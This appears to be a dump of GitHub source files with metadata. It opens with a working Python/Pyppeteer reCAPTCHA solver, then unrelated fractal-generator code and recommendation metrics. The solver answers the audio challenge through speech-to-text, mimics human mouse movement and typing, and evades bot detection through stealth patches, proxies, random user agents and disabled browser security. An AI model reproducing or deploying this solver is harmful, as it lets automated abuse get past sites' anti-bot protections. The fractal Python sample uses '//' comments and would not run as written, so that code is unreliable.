detection\"\"\"\n self.log(\"Clicking random tile\")\n tiles = await self.image_frame.JJ(\".rc-imageselect-tile\")\n await self.click_button(random.choice(tiles))\n\n async def click_audio_button(self):\n \"\"\"Click audio button after it appears.\"\"\"\n audio_button = await self.image_frame.J(\"#recaptcha-audio-button\")\n await self.click_button(audio_button)\n try:\n result = await self.check_detection(self.animation_timeout)\n except SafePassage:\n pass\n else:\n return result\n\n async def get_audio_response(self):\n \"\"\"Download audio data then send to speech-to-text API for answer\"\"\"\n try:\n audio_url = await self.image_frame.evaluate('jQuery(\"#audio-source\").attr(\"src\")')\n if not isinstance(audio_url, str):\n raise DownloadError(f\"Audio url is not valid, expected `str` instead received {type(audio_url)}\")\n except CancelledError:\n raise DownloadError(\"Audio url not found, aborting\")\n\n self.log(\"Downloading audio file ...\")\n try:\n if self.debug:\n self.log(\"audio file: {0}\".format(str(audio_url)))\n # Get the challenge audio to send to Google\n audio_data = await self.loop.create_task(\n util.get_page(audio_url, proxy=self.proxy, proxy_auth=self.proxy_auth, binary=True,\n timeout=self.page_load_timeout))\n self.log(\"Downloaded audio file!\")\n except ClientError as e:\n self.log(f\"Error `{e}` occured during audio download, retrying\")\n else:\n answer = await self.get_answer(audio_data, self.service)\n if answer is not None:\n self.log(f'Received answer \"{answer}\"')\n return answer\n elif self.service is self.speech_service.lower():\n return None # Secondary Recognition\n\n self.log(\"No answer, reloading\")\n await self.click_reload_button()\n func = (\n f'\"{audio_url}\" !== '\n f'jQuery(\".rc-audiochallenge-tdownload-link\").attr(\"href\")')\n try:\n await self.image_frame.waitForFunction(\n func, timeout=self.animation_timeout)\n except TimeoutError:\n raise ReloadError(\"Download link never updated\")\n\n async def type_audio_response(self, answer):\n \"\"\"Enter answer text on input\"\"\"\n self.log(\"Waiting audio response\")\n response_input = None\n for i in range(4):\n response_input = await self.image_frame.J(\"#audio-response\")\n if response_input:\n break\n await asyncio.sleep(2.0) # Wait 2seg\n self.log(\"Typing audio response\")\n length = random.uniform(70, 130)\n try:\n await self.loop.create_task(response_input.type(text=answer, delay=length))\n except Exception:\n raise TryAgain('Try again later')\n\n async def get_answer(self, audio_data, service):\n \"\"\"Get answer text from API selected (Primary and Secondary)\"\"\"\n self.log('Initialize a new recognizer')\n if service == \"google\":\n self.log('Using Google Speech Recognition')\n speech = Google()\n else:\n self.log('Using Wit.AI Recognition')\n speech = WitAI()\n tmpd = tempfile.mkdtemp()\n tmpf = os.path.join(tmpd, \"audio.mp3\")\n await util.save_file(tmpf, data=audio_data, binary=True)\n answer = await self.loop.create_task(speech.get_text(tmpf))\n shutil.rmtree(tmpd)\n return answer\n\n"
},
{
"alpha_fraction": 0.591821551322937,
"alphanum_fraction": 0.5921933054924011,
"avg_line_length": 36.887325286865234,
"blob_id": "6bf89be13ed349bcf5df0b3fc3042b5d56358ea1",
"content_id": "9fff6659b70f3aa25f573865422aa9ba477ccd0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5380,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 142,
"path": "/captcha_solver/solver.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Solver module. \"\"\"\n\nimport sys\nimport time\nimport traceback\n\nfrom pyppeteer.errors import NetworkError, PageError, PyppeteerError\nfrom pyppeteer.util import merge_dict\n\nfrom captcha_solver import util\nfrom captcha_solver.audio import SolveAudio\nfrom captcha_solver.base import Base\nfrom captcha_solver.exceptions import SafePassage, ButtonError, IframeError, TryAgain, ResolveMoreLater\n\n\nclass Solver(Base):\n def __init__(self, pageurl, loop=None, proxy=None, proxy_auth=None, options=None, lang='en-US', chromePath=None, **kwargs):\n self.url = pageurl\n self.loop = loop or util.get_event_loop()\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n self.options = merge_dict({} if options is None else options, kwargs)\n self.chromePath = chromePath\n\n super(Solver, self).__init__(loop=loop, proxy=proxy, proxy_auth=proxy_auth, language=lang, options=options, chromePath=chromePath)\n\n async def start(self):\n \"\"\"Begin solving\"\"\"\n start = time.time()\n result = None\n try:\n self.browser = await self.get_new_browser()\n self.context = await self.browser.createIncognitoBrowserContext()\n await self.open_page(self.url, new_page=False) # Use first page\n result = await self.solve()\n except NetworkError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Network error: {ex}\")\n except ResolveMoreLater as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Resolve More Captcha error: {ex}\")\n except TryAgain as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Try Again error: {ex}\")\n except TimeoutError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Error timeout: {ex}\")\n except PageError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Page Error: {ex}\")\n except IframeError as ex:\n print(f\"IFrame error: {ex}\")\n except PyppeteerError as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Pyppeteer error: {ex}\")\n except Exception as ex:\n traceback.print_exc(file=sys.stdout)\n print(f\"Error unexpected: {ex}\")\n finally:\n # Close all Context and Browser\n if self.context:\n await self.context.close()\n self.context = None\n if self.browser:\n await self.browser.close()\n self.browser = None\n await self.cleanup()\n # Return result\n if isinstance(result, dict):\n status = result['status'].capitalize()\n print(f\"Result: {status}\")\n elapsed = time.time() - start\n print(f\"Time elapsed: {elapsed}\")\n return result\n\n async def solve(self):\n \"\"\"Click checkbox, otherwise attempt to decipher image/audio\"\"\"\n self.log('Solving ...')\n try:\n await self.get_frames()\n except Exception:\n return await self.get_code({'status': 'success'})\n self.log('Wait for CheckBox ...')\n await self.loop.create_task(self.wait_for_checkbox())\n self.log('Click CheckBox ...')\n await self.click_checkbox()\n try:\n result = await self.loop.create_task(\n self.check_detection(self.animation_timeout)) # Detect Detection or captcha finish\n except SafePassage:\n return await self._solve() # Start to solver\n else:\n return self.get_code(result)\n\n async def _solve(self):\n self.log('Using Audio Solver')\n self.audio = SolveAudio(page=self.page, image_frame=self.image_frame, loop=self.loop, proxy=self.proxy, proxy_auth=self.proxy_auth, options=self.options, chromePath=self.chromePath)\n solve = self.audio.solve_by_audio\n try:\n result = await self.loop.create_task(solve())\n return await self.get_code(result)\n except PyppeteerError as ex:\n raise TryAgain(ex)\n\n async def get_code(self, result_status):\n if result_status[\"status\"] == \"success\":\n code = await self.g_recaptcha_response()\n if code:\n result_status[\"code\"] = code\n return result_status\n else:\n return result_status\n\n async def wait_for_checkbox(self):\n \"\"\"Wait for checkbox to appear.\"\"\"\n try:\n await self.checkbox_frame.waitForFunction(\n \"jQuery('#recaptcha-anchor').length\",\n timeout=self.animation_timeout)\n except ButtonError:\n raise ButtonError(\"Checkbox missing, aborting\")\n except Exception as ex:\n self.log(ex)\n await self.click_checkbox() # Try Click\n\n async def click_checkbox(self):\n \"\"\"Click checkbox on page load.\"\"\"\n try:\n checkbox = await self.checkbox_frame.J(\"#recaptcha-anchor\")\n await self.click_button(checkbox)\n except Exception as ex:\n self.log(ex)\n raise ex\n\n async def g_recaptcha_response(self):\n \"\"\"Result of captcha\"\"\"\n code = await self.page.evaluate(\n \"jQuery('#g-recaptcha-response').val()\")\n return code\n"
},
{
"alpha_fraction": 0.5763786435127258,
"alphanum_fraction": 0.5827181935310364,
"avg_line_length": 36.02572250366211,
"blob_id": "d55658c11cd2be20755de70050fee0b883e30b36",
"content_id": "db4796dcb928e687913aee8bae8959d8fa33b936",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11515,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 311,
"path": "/captcha_solver/base.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Base module. \"\"\"\nimport asyncio\nimport logging\nimport os\nimport random\nimport sys\nimport traceback\nfrom shutil import copyfile\n\nimport fuckcaptcha\nfrom fake_useragent import UserAgent\nfrom pyppeteer.errors import TimeoutError, PageError, PyppeteerError, NetworkError\nfrom pyppeteer.launcher import Launcher\nfrom pyppeteer.util import merge_dict\nfrom pyppeteer_stealth import stealth\n\nfrom captcha_solver import package_dir\nfrom captcha_solver.exceptions import SafePassage, TryAgain\nfrom captcha_solver.util import get_event_loop, load_file\n\nif len(logging.root.handlers) == 0:\n logging.basicConfig(format=\"%(asctime)s %(message)s\")\n\ntry:\n import yaml\n\n yaml.warnings({'YAMLLoadWarning': False})\n\n with open(\"captcha_solver.yaml\") as f:\n settings = yaml.load(f)\nexcept FileNotFoundError:\n logging.error(\n \"Solver can't run without a configuration file!\\n\"\n )\n\n copyfile(\n f\"{package_dir}/captcha_solver.example.yaml\", \"captcha_solver.example.yaml\")\n sys.exit(0)\n\n\nclass Base:\n \"\"\"Base control Pyppeteer\"\"\"\n\n browser = None\n context = None\n launcher = None\n page = None\n page_index = 0\n loop = None\n\n # Import configurations\n logger = logging.getLogger(__name__)\n debug = settings[\"debug\"]\n if debug:\n logger.setLevel(\"DEBUG\")\n headless = settings[\"headless\"]\n keyboard_traverse = settings[\"keyboard_traverse\"]\n page_load_timeout = settings[\"timeout\"][\"page_load\"] * 1000\n click_timeout = settings[\"timeout\"][\"click\"] * 1000\n animation_timeout = settings[\"timeout\"][\"animation\"] * 1000\n speech_service = settings[\"speech\"][\"service\"]\n speech_secondary_service = settings[\"speech\"][\"secondary_service\"]\n jquery_data = os.path.join(package_dir, settings[\"data\"][\"jquery_js\"])\n\n def __init__(self, loop=None, proxy=None, proxy_auth=None, options=None, language='en-US', chromePath=None, **kwargs):\n self.options = merge_dict({} if options is None else options, kwargs)\n self.loop = loop or get_event_loop()\n self.proxy = proxy\n self.proxy_auth = proxy_auth\n self.language = language\n self.chromePath = chromePath\n\n import pyppdf.patch_pyppeteer # Patch Pyppeter (Fix InvalidStateError and Download Chrome)\n\n async def get_frames(self):\n \"\"\"Get frames to checkbox and image_frame of reCaptcha\"\"\"\n self.checkbox_frame = next(frame for frame in self.page.frames if \"api2/anchor\" in frame.url)\n self.image_frame = next(frame for frame in self.page.frames if \"api2/bframe\" in frame.url)\n\n async def click_reload_button(self):\n \"\"\"Click reload button\"\"\"\n self.log('Click reload ...')\n reload_button = await self.image_frame.J(\"#recaptcha-reload-button\")\n await self.click_button(reload_button)\n await asyncio.sleep(self.click_timeout / 1000) # Wait for animations (Change other images)\n\n async def check_detection(self, timeout):\n \"\"\"Checks if \"Try again later\", \"please solve more\" modal appears or success\"\"\"\n\n func = \"\"\"(function() {\n checkbox_frame = parent.window.jQuery(\n \"iframe[src*='api2/anchor']\").contents();\n image_frame = parent.window.jQuery(\n \"iframe[src*='api2/bframe']\").contents();\n\n var bot_header = jQuery(\".rc-doscaptcha-header-text\", image_frame)\n if(bot_header.length){\n if(bot_header.text().indexOf(\"Try again later\") > -1){\n parent.window.wasdetected = true;\n return true;\n }\n }\n\n var try_again_header = jQuery(\n \".rc-audiochallenge-error-message\", image_frame)\n if(try_again_header.length){\n if(try_again_header.text().indexOf(\"please solve more\") > -1){\n try_again_header.text('Trying again...')\n parent.window.tryagain = true;\n return true;\n }\n }\n\n var checkbox_anchor = jQuery(\".recaptcha-checkbox\", checkbox_frame);\n if(checkbox_anchor.attr(\"aria-checked\") === \"true\"){\n parent.window.success = true;\n return true;\n }\n\n})()\"\"\"\n try:\n await self.page.waitForFunction(func, timeout=timeout)\n except asyncio.TimeoutError:\n raise SafePassage()\n except Exception as ex:\n self.log('FATAL ERROR: {0}'.format(ex))\n else:\n status = '?'\n if await self.page.evaluate(\"parent.window.wasdetected === true;\"):\n status = \"detected\"\n elif await self.page.evaluate(\"parent.window.success === true\"):\n status = \"success\"\n elif await self.page.evaluate(\"parent.window.tryagain === true\"):\n await self.page.evaluate(\"parent.window.tryagain = false;\")\n raise TryAgain()\n return {\"status\": status}\n\n async def click_verify(self):\n \"\"\"Click button of Verify\"\"\"\n self.log('Verifying ...')\n element = await self.image_frame.querySelector('#recaptcha-verify-button')\n try:\n await self.click_button(element)\n await asyncio.sleep(self.click_timeout / 1000) # Wait for animations (Change other images)\n except Exception as ex:\n self.log(ex)\n raise Exception(ex)\n\n async def click_button(self, button):\n \"\"\"Click button object\"\"\"\n if self.keyboard_traverse:\n bb = await button.boundingBox()\n await self.page.mouse.move(\n random.uniform(0, 800),\n random.uniform(0, 600),\n steps=int(random.uniform(40, 90))\n )\n await self.page.mouse.move(\n bb[\"x\"], bb[\"y\"], steps=int(random.uniform(40, 90))\n )\n await button.hover()\n await asyncio.sleep(random.uniform(0, 2))\n click_delay = random.uniform(30, 170)\n await button.click(delay=click_delay)\n\n async def open_page(self, url, cookies=None, new_page=True):\n \"\"\"Create new page\"\"\"\n if new_page:\n self.page_index += 1 # Add Actual Index\n self.page = await self.context.newPage()\n if self.proxy_auth and self.proxy:\n await self.page.authenticate(self.proxy_auth)\n self.log(f\"Open page with proxy {self.proxy}\")\n await self.set_bypass_csp() # Set Bypass Enable\n await self.set_cookies(cookies) # Set Cookies\n await self.on_goto()\n await stealth(self.page) # Headless Browser prevent detection\n await self.goto(url) # Go to page\n await self.on_start()\n\n async def goto(self, url):\n \"\"\"Navigate to address\"\"\"\n jquery_js = await load_file(self.jquery_data)\n await self.page.evaluateOnNewDocument(\"() => {\\n%s}\" % jquery_js) # Inject JQuery\n await self.page.setExtraHTTPHeaders({'Accept-Language': self.language}) # Forced set Language\n await fuckcaptcha.bypass_detections(self.page) # bypass reCAPTCHA detection in pyppeteer\n retry = 3 # Go to Page and Retry 3 times\n while True:\n try:\n await self.loop.create_task(self.page.goto(\n url, timeout=self.page_load_timeout * 1000,\n waitUntil=[\"networkidle0\", \"domcontentloaded\"]\n ))\n break\n except asyncio.TimeoutError as ex:\n traceback.print_exc(file=sys.stdout)\n self.log('Error timeout: ' + str(ex) + ' retry ' + str(retry))\n if retry > 0:\n retry -= 1\n else:\n raise TimeoutError(\"Page loading timed-out\")\n except PyppeteerError as ex:\n traceback.print_exc(file=sys.stdout)\n self.log(f\"Pyppeteer error: {ex}\")\n if retry > 0:\n retry -= 1\n else:\n raise ex\n except Exception as ex:\n traceback.print_exc(file=sys.stdout)\n self.log('Error unexpected: ' + str(ex) + ' retry ' + str(retry))\n if retry > 0:\n retry -= 1\n else:\n raise PageError(f\"Page raised an error: `{ex}`\")\n\n async def get_new_browser(self):\n \"\"\"Get a new browser, set proxy and arguments\"\"\"\n agent = UserAgent(verify_ssl=False).random\n args = [\n '--cryptauth-http-host \"\"',\n '--disable-accelerated-2d-canvas',\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-browser-side-navigation',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-dev-shm-usage',\n '--disable-device-discovery-notifications',\n '--disable-extensions',\n '--disable-features=site-per-process',\n '--disable-hang-monitor',\n '--disable-java',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-setuid-sandbox',\n '--disable-sync',\n '--disable-translate',\n '--disable-web-security',\n '--disable-webgl',\n '--metrics-recording-only',\n '--no-first-run',\n '--safebrowsing-disable-auto-update',\n '--no-sandbox',\n # Automation arguments\n '--enable-automation',\n '--password-store=basic',\n '--use-mock-keychain',\n '--lang=\"{0}\"'.format(self.language),\n '--user-agent=\"{0}\"'.format(agent)]\n if self.proxy:\n args.append(f\"--proxy-server={self.proxy}\")\n if \"args\" in self.options:\n args.extend(self.options.pop(\"args\"))\n self.options.update({\n \"headless\": self.headless,\n \"args\": args,\n # Silence Pyppeteer logs\n \"logLevel\": \"CRITICAL\"})\n if self.chromePath:\n self.options.update({\n \"executablePath\": self.chromePath,\n })\n self.launcher = Launcher(self.options, handleSIGINT=False, handleSIGTERM=False, handleSIGHUP=False)\n browser = await self.launcher.launch()\n # Set user-agent to all pages\n pages = await browser.pages()\n for page in pages:\n await page.setUserAgent(agent)\n self.page = pages[0] # Set first page\n return browser\n\n\n async def set_cookies(self, cookies=None):\n \"\"\"Set cookie list to current page\"\"\"\n if cookies:\n for cookie in cookies:\n cookie['url'] = self.page.url\n await self.page.setCookie(cookie)\n\n async def wait_load(self, waitUntil='load'):\n \"\"\"Wait for Navigation\"\"\"\n await self.page.waitForNavigation({'waitUntil': waitUntil})\n\n async def cleanup(self):\n \"\"\"Kill Browser\"\"\"\n if self.launcher:\n await self.launcher.killChrome()\n self.log('Browser closed')\n\n async def set_bypass_csp(self):\n \"\"\"Enable bypassing of page's Content-Security-Policy.\"\"\"\n await self.page._client.send(\"Page.setBypassCSP\", {'enabled': True})\n\n async def on_goto(self):\n \"\"\"Run before to open URL\"\"\"\n pass\n\n async def on_start(self):\n \"\"\"Run after to open URL\"\"\"\n pass\n\n async def on_finish(self):\n \"\"\"Run after to finish the process\"\"\"\n pass\n\n def log(self, message):\n self.logger.debug(f\"[{self.page_index}] {message}\")\n"
}
] | 7 |
4eckme/Tetrascope
|
https://github.com/4eckme/Tetrascope
|
95b2429c370de755ee9e0baaee8f8d00d83c118f
|
803dfdef60e1d894e489a9e59494a5fd5774801b
|
ed3d1fcb23bbde5583c641fa7a8ecdaa6dbf7d5d
|
refs/heads/main
| 2023-01-23T10:09:16.674880 | 2020-12-07T01:13:59 | 2020-12-07T01:13:59 | 318,666,799 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.48426395654678345,
"alphanum_fraction": 0.5147207975387573,
"avg_line_length": 23.625,
"blob_id": "fcbf7674561f20532a3b080495338f959ed714b6",
"content_id": "453cb6633a8ed0886700e68b5adcd7664bd4ff95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 985,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/tetrascope.sample.py",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "// Tetrascope sample\n// R=1024px, scale=100%\n\nimport numpy as np\nfrom PIL import Image\n \nR = 1024\nD = 2*R+1\n \ndef hex_to_rgb(value):\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n \ndef hex_to_str(c):\n c = c.lstrip('0x')\n if len(c) <= 6:\n return c.ljust(6, '0')\n else:\n return c.substring(0, 6)\n \ndata = np.zeros((D,D,3), dtype=np.uint8)\nsqrR = R*R\nfor x in range(0, R):\n if not x % 128:\n print(x, \" rows rendered\")\n for y in range (x, R):\n sqr = (x*x+y*y)\n if sqr <= sqrR:\n rgbtuple = hex_to_rgb(hex_to_str(hex(sqr)))\n data[R+x,R+y] = rgbtuple\n data[R+x,R-y] = rgbtuple\n data[R-x,R+y] = rgbtuple\n data[R-x,R-y] = rgbtuple\n data[R+y,R+x] = rgbtuple\n data[R+y,R-x] = rgbtuple\n data[R-y,R+x] = rgbtuple\n data[R-y,R-x] = rgbtuple\n \nimg = Image.fromarray(data)\nimg.save(\"tetrascope.png\")\n"
},
{
"alpha_fraction": 0.5537459254264832,
"alphanum_fraction": 0.5586318969726562,
"avg_line_length": 28.238094329833984,
"blob_id": "2e9f96782c248b88f620d4b8b2c43f6373ceba6d",
"content_id": "4185d9bde8e8f85fac89296e25e8bb8a76265f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 614,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 21,
"path": "/README.md",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "# Tetrascope collection\n\nMath formula for pixels X11 color hex code:\n* tetrascope.math.svg - (x, y: position relative to central pixel of image)\n\n-------------------------------------------------------\n\nSimple fractal generator:\n* tetrascope.sample.go - for Go\n* tetrascope.sample.py - for Python\n\n-------------------------------------------------------\n\nGenerated image:\n* tetrascope.png\n\n-------------------------------------------------------\n\nAnimation of tetrascope scaling:\n* tetrascope.play.js - available to execute in browser console\n* tetrascope.play.glsl - preview https://www.shadertoy.com/view/wscBD2\n"
},
{
"alpha_fraction": 0.46691519021987915,
"alphanum_fraction": 0.518173336982727,
"avg_line_length": 40.269229888916016,
"blob_id": "bacb5ba391108a2c41ce984fe5b622b0f6be362c",
"content_id": "a496a4fd3222b68f31af21d4f65389efb82cdd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 26,
"path": "/tetrascope.play.js",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "// Tetrascope fractal animation\n// Availiable to execute in browser console\n// For base tetrascope image set R=1024, n=1\n(function(){ var R = 256; var D=2*R+1;\nvar pow = Math.pow; var floor=Math.floor; var ceil=Math.ceil; var log2 = Math.log2;\nvar rgb = function(x, y, n){ return floor( (x*x*n+y*y*n)*pow(16, ( 6-ceil(log2(x*x*n+y*y*n)/4)) ) ); }\ndocument.body.innerHTML=('<canvas id=\"C\" width=\"'+D+'\" height=\"'+D+'\"></canvas>');\nvar canvas = document.getElementById('C');\nvar ctx = canvas.getContext('2d');\nwindow.n=0; var si = setInterval(function () {\n window.n += 1;\n for(var x = 0;x<=R;x++) {\n for(var y = 0;y<=R;y++) {\n ctx.fillStyle='#'+rgb(x, y, n).toString(16); \n if (x===0&&y===0) ctx.fillStyle=\"#000000\";\n var X1 = R-x;\n var Y1 = R-y;\n var X2 = R+x;\n var Y2 = R+y;\n if ( ( x*x+y*y ) < R*R ) { \n ctx.fillRect(X1, Y1, 1, 1);\n ctx.fillRect(X1, Y2, 1, 1);\n ctx.fillRect(X2, Y1, 1, 1);\n ctx.fillRect(X2, Y2, 1, 1);\n} } } }, 100);\n})();\n"
},
{
"alpha_fraction": 0.4237510859966278,
"alphanum_fraction": 0.46231377124786377,
"avg_line_length": 23.80434799194336,
"blob_id": "108aaa1ab70d45afee79c7cc98bca6ec89b01e20",
"content_id": "2197568cf6a924b52b2b1a3f8624f5ca288306be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Go",
"length_bytes": 2282,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 92,
"path": "/tetrascope.sample.go",
"repo_name": "4eckme/Tetrascope",
"src_encoding": "UTF-8",
"text": "//Tetrascope sample\n//R=1024px, scale=100%\n\npackage main\n\nimport (\n \"image\"\n \"image/color\"\n \"image/draw\"\n \"image/png\"\n \"os\"\n \"strings\"\n \"strconv\"\n)\n\nfunc ConvertToColor(s string) (r string) {\n\n r = s\n if len(s)<6 {\n r = s+strings.Repeat(\"0\", 6-len(s))\n } else if len(s)>6 {\n r = string(s[0:6])\n }\n return r\n}\n\nfunc ParseHexColorFast(s string) (c color.RGBA) {\n\n c.A = 0xff\n\n if s[0] != '#' {\n return c\n }\n\n hexToByte := func(b byte) byte {\n switch {\n case b >= '0' && b <= '9':\n return b - '0'\n case b >= 'a' && b <= 'f':\n return b - 'a' + 10\n case b >= 'A' && b <= 'F':\n return b - 'A' + 10\n }\n return 0\n }\n\n c.R = hexToByte(s[1])<<4 + hexToByte(s[2])\n c.G = hexToByte(s[3])<<4 + hexToByte(s[4])\n c.B = hexToByte(s[5])<<4 + hexToByte(s[6])\n\n return\n}\n\nfunc main() {\n \n R:=1024\n D:=R*2+1; \n new_png_file := \"tetrascope.png\"\n \n myimage := image.NewRGBA(image.Rect(0, 0, D, D))\n bgcolor := color.RGBA{0, 0, 0, 0}\n draw.Draw(myimage, myimage.Bounds(), &image.Uniform{bgcolor}, image.ZP, draw.Src)\n\n for x:=0; x<=R; x++ {\n for y:=0; y<=R; y++ {\n x1 := R-x\n x2 := R+x\n y1 := R-y\n y2 := R+y\n if x*x+y*y <= R*R {\n var c int64; \n c = int64(x*x+y*y);\n col := \"#\"+ConvertToColor(strconv.FormatInt(c, 16))\n color := ParseHexColorFast(col)\n pixel1 := image.Rect(x1, y1, x1+1, y1+1)\n pixel2 := image.Rect(x1, y2, x1+1, y2+1)\n pixel3 := image.Rect(x2, y1, x2+1, y1+1)\n pixel4 := image.Rect(x2, y2, x2+1, y2+1)\n draw.Draw(myimage, pixel1, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel2, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel3, &image.Uniform{color}, image.ZP, draw.Src)\n draw.Draw(myimage, pixel4, &image.Uniform{color}, image.ZP, draw.Src)\n }\n } \n }\n\n myfile, err := os.Create(new_png_file)\n if err != nil {\n panic(err)\n }\n png.Encode(myfile, myimage)\n}\n"
}
] | 4 |
dmitrydoni/gb-recommendation-systems
|
https://github.com/dmitrydoni/gb-recommendation-systems
|
157ffd65ca4ecf1a33b952b9c1989ea8c0cd0790
|
80200c2e6777873b9f1d9e51594fd86811248ef9
|
29eed468dd48c68ad5443dea690d2acc418927cb
|
refs/heads/master
| 2022-09-07T16:50:53.807963 | 2020-06-01T10:46:00 | 2020-06-01T10:46:00 | 265,688,555 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6257046461105347,
"alphanum_fraction": 0.6295377612113953,
"avg_line_length": 25.5508975982666,
"blob_id": "979fa163ef13574bf00c3e4adb0d68933e4dd1d3",
"content_id": "a9fd8d7b7f1841ebe0d6ee96dd3c425b217929e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4441,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 167,
"path": "/src/metrics.py",
"repo_name": "dmitrydoni/gb-recommendation-systems",
"src_encoding": "UTF-8",
"text": "def hit_rate(recommended_list, bought_list):\n \"\"\"Hit rate\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n hit_rate = (flags.sum() > 0) * 1\n \n return hit_rate\n\n\ndef hit_rate_at_k(recommended_list, bought_list, k=5):\n \"\"\"Hit rate@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list_top_k = np.array(recommended_list[:k])\n \n flags = np.isin(bought_list, recommended_list_top_k)\n \n hit_rate_at_k = (flags.sum() > 0) * 1\n \n return hit_rate_at_k\n\n\ndef precision(recommended_list, bought_list):\n \"\"\"Precision\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n precision = flags.sum() / len(recommended_list)\n \n return precision\n\n\ndef precision_at_k(recommended_list, bought_list, k=5):\n \"\"\"Precision@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n bought_list = bought_list # Тут нет [:k] !!\n recommended_list = recommended_list[:k]\n \n flags = np.isin(bought_list, recommended_list)\n \n precision_at_k = flags.sum() / len(recommended_list)\n \n return precision_at_k\n\n\ndef money_precision_at_k(recommended_list, bought_list, prices_recommended, k=5):\n \"\"\"Money Precision@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n prices_recommended = np.array(prices_recommended)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n prices_recommended = prices_recommended[:k]\n \n flags = np.isin(recommended_list, bought_list)\n k_ones = np.ones(k)\n \n # Calculate scalar products\n revenue_k_recommended_relevant = np.dot(flags[:k], prices_recommended)\n revenue_k_recommended = np.dot(k_ones, prices_recommended)\n \n money_precision_at_k = revenue_k_recommended_relevant / revenue_k_recommended\n \n return money_precision_at_k\n\n\ndef recall(recommended_list, bought_list):\n \"\"\"Recall\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n recall = flags.sum() / len(bought_list)\n \n return recall\n\n\ndef recall_at_k(recommended_list, bought_list, k=5):\n \"\"\"Recall@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n \n flags = np.isin(bought_list, recommended_list)\n \n recall_at_k = flags.sum() / len(bought_list)\n \n return recall_at_k\n\n\ndef money_recall_at_k(recommended_list, bought_list, prices_recommended, prices_bought, k=5):\n \"\"\"Money Recall@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n prices_recommended = np.array(prices_recommended)\n prices_bought = np.array(prices_bought)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n prices_recommended = prices_recommended[:k]\n \n flags = np.isin(bought_list, recommended_list)\n relevant_ones = np.ones(len(bought_list))\n \n # Calculate scalar products\n revenue_k_recommended_relevant = np.dot(flags[:k], prices_bought[:k])\n revenue_relevant = np.dot(relevant_ones, prices_bought)\n \n money_recall_at_k = revenue_k_recommended_relevant / revenue_relevant\n \n return money_recall_at_k\n\n\ndef ap_k(recommended_list, bought_list, k=5):\n \"\"\"Average Precision@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(recommended_list, bought_list)\n \n if sum(flags) == 0:\n return 0\n \n sum_ = 0\n for i in range(1, k+1):\n \n if flags[i] == True:\n p_k = precision_at_k(recommended_list, bought_list, k=i)\n sum_ += p_k\n \n result = sum_ / sum(flags)\n \n return result\n\n\ndef map_k(recommended_list, bought_lists, k=5):\n \"\"\"Mean Average Precision@k\"\"\"\n \n ap_k = 0\n apk_list = [] \n \n for bought_list in bought_lists:\n ap_k = ap_k(recommended_list, bought_list, k)\n apk_list.append(ap_k)\n \n map_k = sum(apk_list) / len(apk_list)\n \n return map_k\n\n"
},
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 27,
"blob_id": "84692ac5939fb6864e6cd0ccebac24e21e2bec95",
